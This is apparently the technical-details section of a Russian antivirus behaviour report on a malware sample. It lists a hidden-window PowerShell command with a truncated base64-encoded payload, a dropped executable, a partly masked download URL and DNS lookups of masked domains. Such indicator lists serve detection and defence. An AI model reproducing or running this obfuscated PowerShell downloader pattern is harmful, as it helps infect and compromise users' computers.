Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABTAHYAegBwAGQAaABnAHYAPQAnAEIAYgBzAGQAdgBnAHQAZABsAGoAcAAnADsAJABNAHYAYQBpAGYAZQBtAHIAdQBoACAAPQAgAC...
- %HOMEPATH%\188.exe
- %HOMEPATH%\188.exe
- http://bl#####beautyandspa.com/backup/7tu1ct-ncjyrs-03/
- DNS ASK za######r.000webhostapp.com
- DNS ASK bl#####beautyandspa.com
- DNS ASK fi###rpacc.com
- DNS ASK is###web.com
- DNS ASK sm###r.online
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABTAHYAegBwAGQAaABnAHYAPQAnAEIAYgBzAGQAdgBnAHQAZABsAGoAcAAnADsAJABNAHYAYQBpAGYAZQBtAHIAdQBoACAAPQAgAC...' (со скрытым окном)